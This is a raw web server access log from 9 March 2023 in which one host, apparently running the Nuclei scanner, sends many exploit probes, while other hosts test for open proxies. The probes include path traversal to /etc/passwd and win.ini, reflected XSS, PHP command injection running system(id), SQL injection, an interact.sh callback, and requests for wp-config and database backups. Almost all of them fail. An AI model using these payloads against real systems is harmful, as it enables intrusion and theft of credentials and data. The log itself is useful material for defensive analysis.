90.151.171.106 - - [09/Mar/2023:05:26:49 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:05:26:49 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:05:26:49 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:05:26:49 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:05:26:49 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:05:26:54 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:05:26:54 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:05:26:54 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:05:31:06 +0530] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 404 1124
72.44.65.82 - - [09/Mar/2023:05:31:15 +0530] "POST /controller/login.php?acao=autenticar HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:05:31:23 +0530] "POST /thruk/cgi-bin/login.cgi HTTP/1.1" 404 1040
167.94.138.34 - - [09/Mar/2023:05:36:55 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.34 - - [09/Mar/2023:05:36:56 +0530] "GET / HTTP/1.1" 200 11250
167.94.138.34 - - [09/Mar/2023:05:36:56 +0530] "PRI * HTTP/2.0" 505 -
167.94.138.34 - - [09/Mar/2023:05:36:57 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
72.44.65.82 - - [09/Mar/2023:05:37:18 +0530] "GET /home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:05:39:38 +0530] "GET /webui/?file_name=../../../../../../../../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:05:39:39 +0530] "GET /webui/?file_name=../../../../../../../../../../../../c:/windows/win.ini&g=sys_dia_data_down HTTP/1.1" 404 1006
72.44.65.82 - - [09/Mar/2023:05:40:20 +0530] "GET /seeyon/test123456.jsp?2MgieAQRDt6sqn5NBE4cUWsrsfk=ipconfig&pwd=asasd3344 HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:05:41:28 +0530] "POST /api/login HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:05:42:46 +0530] "GET /jkstatus; HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:05:49:06 +0530] "GET /laravel-filemanager/download?file=passwd&type=Files&working_dir=%2F../../../../../../../../../../../../../../../../../../../etc HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:05:49:22 +0530] "POST /php/login.php HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:05:51:30 +0530] "GET /sendgrid.env HTTP/1.1" 404 1018
72.44.65.82 - - [09/Mar/2023:05:54:28 +0530] "POST /index.php?action=login.index HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:05:56:32 +0530] "GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:05:57:34 +0530] "GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1" 404 1130
72.44.65.82 - - [09/Mar/2023:05:59:40 +0530] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:06:04:35 +0530] "GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:06:07:45 +0530] "GET /karma.js HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:06:10:47 +0530] "POST /cgi/login.cgi HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:06:12:36 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:06:12:43 +0530] "GET /2Mgie37t6faolsFFMwoF2wW0k0V.txt HTTP/1.1" 404 1056
72.44.65.82 - - [09/Mar/2023:06:14:00 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
72.44.65.82 - - [09/Mar/2023:06:14:04 +0530] "GET /wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22 HTTP/1.1" 404 1096
72.44.65.82 - - [09/Mar/2023:06:15:23 +0530] "GET /wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1040
90.151.171.108 - - [09/Mar/2023:06:18:02 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:06:18:02 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:06:18:02 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:06:18:02 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:06:18:07 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:06:18:07 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:06:18:07 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:06:18:07 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:06:18:16 +0530] "GET /scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:06:18:17 +0530] "GET /scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:06:19:20 +0530] "GET /viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:06:20:18 +0530] "GET /plugins/jobsearch/?ajax_filter=true&posted=all&search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&sort-by=recent HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:06:25:54 +0530] "GET /index.php?query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)&s=weibo/Share/shareBox HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:06:26:02 +0530] "GET /index.php?query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)&s=weibo/Share/shareBox HTTP/1.1" 404 1012
87.236.176.216 - - [09/Mar/2023:06:26:30 +0530] "GET / HTTP/1.1" 200 11250
87.236.176.32 - - [09/Mar/2023:06:26:30 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
72.44.65.82 - - [09/Mar/2023:06:30:23 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:06:31:41 +0530] "GET /cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1 HTTP/1.1" 404 1044
72.44.65.82 - - [09/Mar/2023:06:35:29 +0530] "GET /php/connector.minimal.php?cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk HTTP/1.1" 404 1044
193.142.146.101 - - [09/Mar/2023:06:39:35 +0530] "GET / HTTP/1.1" 200 11250
193.142.146.101 - - [09/Mar/2023:06:40:07 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:06:40:28 +0530] "GET /BSW_cxttongr.htm HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:06:42:23 +0530] "GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1050
72.44.65.82 - - [09/Mar/2023:06:44:42 +0530] "GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:06:44:53 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:06:47:14 +0530] "POST /homeaction.php HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:06:48:05 +0530] "GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1" 404 1034
107.170.246.16 - - [09/Mar/2023:06:54:39 +0530] "-" 400 -
107.170.246.16 - - [09/Mar/2023:06:55:37 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:06:57:24 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_lovefactory HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:06:57:44 +0530] "POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1" 404 1084
72.44.65.82 - - [09/Mar/2023:06:59:22 +0530] "PUT /poc.jsp/ HTTP/1.1" 403 1004
72.44.65.82 - - [09/Mar/2023:07:01:08 +0530] "GET /ftb.imagegallery.aspx HTTP/1.1" 404 1036
72.44.65.82 - - [09/Mar/2023:07:03:19 +0530] "GET /data.sql HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:07:03:30 +0530] "GET /dbdump.sql HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:04:01 +0530] "GET /103.145.51.236:8080_db.sql HTTP/1.1" 404 1046
72.44.65.82 - - [09/Mar/2023:07:04:12 +0530] "GET /mysqldump.sql HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:07:04:20 +0530] "GET /mysql.sql HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:07:04:32 +0530] "GET /sql.sql HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:07:04:52 +0530] "GET /users.sql HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:07:07:02 +0530] "GET /html/log HTTP/1.1" 404 1010
143.255.242.219 - - [09/Mar/2023:07:09:08 +0530] "GET / HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:07:12:19 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:07:12:19 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [09/Mar/2023:07:12:19 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:07:12:19 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:07:12:19 +0530] "GET /ip.php?Z78909657371Q1 HTTP/1.1" 404 1006
90.151.171.108 - - [09/Mar/2023:07:12:24 +0530] "-" 400 -
90.151.171.108 - - [09/Mar/2023:07:12:24 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [09/Mar/2023:07:12:24 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:07:12:31 +0530] "POST /login/dologin HTTP/1.1" 404 1020
92.118.39.82 - - [09/Mar/2023:07:15:04 +0530] "GET / HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:07:16:27 +0530] "GET /?action=stream HTTP/1.1" 200 11250
72.44.65.82 - - [09/Mar/2023:07:16:37 +0530] "GET null null" 400 -
72.44.65.82 - - [09/Mar/2023:07:16:57 +0530] "PUT /v1/kv/2MgieDo3xnwz7MQl09gqc9YKxKv HTTP/1.1" 403 1004
72.44.65.82 - - [09/Mar/2023:07:18:28 +0530] "GET /ADSearch.cc?methodToCall=search HTTP/1.1" 404 1016
72.44.65.82 - - [09/Mar/2023:07:21:51 +0530] "GET /wp-config.php HTTP/1.1" 404 1020
72.44.65.82 - - [09/Mar/2023:07:22:02 +0530] "GET /wp-config-sample.php HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:07:22:40 +0530] "GET /wp-config.php.txt HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:07:22:44 +0530] "GET /wp-config.php.bak HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:07:22:47 +0530] "GET /wp-content/plugins/activehelper-livehelp/server/offline.php?BCC=BCC&COMPANY=COMPANY&COMPLETE=COMPLETE&DOMAINID=DOMAINID&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&PHONE=PHONE&SECURITY=SECURITY&SERVER=SERVER&TITLE=TITLE&URL=URL HTTP/1.1" 404 1112
72.44.65.82 - - [09/Mar/2023:07:22:58 +0530] "GET /wp-config.php.dist HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:07:23:02 +0530] "GET /wp-config.php.inc HTTP/1.1" 404 1028
72.44.65.82 - - [09/Mar/2023:07:23:14 +0530] "GET /wp-config.php.html HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:07:23:22 +0530] "GET /wp-config-backup.txt HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:07:23:26 +0530] "GET /horde/admin/user.php HTTP/1.1" 404 1034
72.44.65.82 - - [09/Mar/2023:07:23:27 +0530] "GET /admin/user.php HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:07:23:33 +0530] "GET /wp-config.php~ HTTP/1.1" 404 1022
72.44.65.82 - - [09/Mar/2023:07:24:09 +0530] "GET //%5Cinteract.sh/a%3Fb/ HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:07:26:44 +0530] "GET /control/userimage.html HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:07:27:01 +0530] "GET /api/v1/cluster/summary HTTP/1.1" 404 1038
72.44.65.82 - - [09/Mar/2023:07:28:28 +0530] "GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1118
72.44.65.82 - - [09/Mar/2023:07:34:35 +0530] "GET /opensis/ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1026
72.44.65.82 - - [09/Mar/2023:07:34:36 +0530] "GET /ajax.php?bypass=Transcripts.php&modname=misc/../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1010
72.44.65.82 - - [09/Mar/2023:07:37:35 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:35 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:39 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:50 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:50 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:51 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:37:52 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:02 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:10 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:17 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:29 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:33 +0530] "GET /mailsms/s?dumpConfig=/&func=ADMIN:appState HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:07:38:33 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:34 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:47 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:38:58 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:39:28 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:39:30 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:39:41 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:40:08 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:40:46 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:40:47 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:40:58 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:06 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:10 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:10 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:14 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:15 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:16 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:54 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:41:55 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:13 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:21 +0530] "GET /./../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
72.44.65.82 - - [09/Mar/2023:07:42:34 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:35 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:36 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:47 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:57 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:58 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:42:58 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:02 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:13 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:16 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:18 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:18 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:19 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:43:37 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:44:10 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:44:18 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:44:19 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:44:29 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:45:00 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:45:00 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:45:08 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
90.151.171.106 - - [09/Mar/2023:07:45:11 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:07:45:11 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [09/Mar/2023:07:45:11 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:07:45:11 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:07:45:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:07:45:16 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [09/Mar/2023:07:45:16 +0530] "-" 400 -
90.151.171.106 - - [09/Mar/2023:07:45:16 +0530] "-" 400 -
72.44.65.82 - - [09/Mar/2023:07:45:36 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:45:36 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:45:37 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:46:11 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:46:22 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:46:53 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:47:00 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:47:01 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:47:23 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:47:43 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:04 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:15 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:15 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:36 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:43 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:48:53 +0530] "POST /debug.php HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:07:49:24 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:49:26 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:49:26 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:49:27 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:49:27 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:19 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:20 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:30 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:34 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:48 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:50:53 +0530] "GET /eam/vib?id=/etc/issue HTTP/1.1" 404 1008
72.44.65.82 - - [09/Mar/2023:07:50:58 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:51:10 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:51:13 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery HTTP/1.1" 404 1012
72.44.65.82 - - [09/Mar/2023:07:51:20 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:51:34 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:52:05 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:52:05 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:52:17 +0530] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:07:52:19 +0530] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 1030
72.44.65.82 - - [09/Mar/2023:07:52:46 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:52:56 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:52:57 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:53:25 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:53:33 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:53:46 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:53:47 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:54:05 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:54:06 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:54:07 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:54:28 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:54:49 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:13 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:14 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:16 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:44 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:44 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:45 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:55:46 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:17 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
72.44.65.82 - - [09/Mar/2023:07:56:18 +0530] "GET /nuclei.svg?ebGEs=x HTTP/1.1" 404 1014
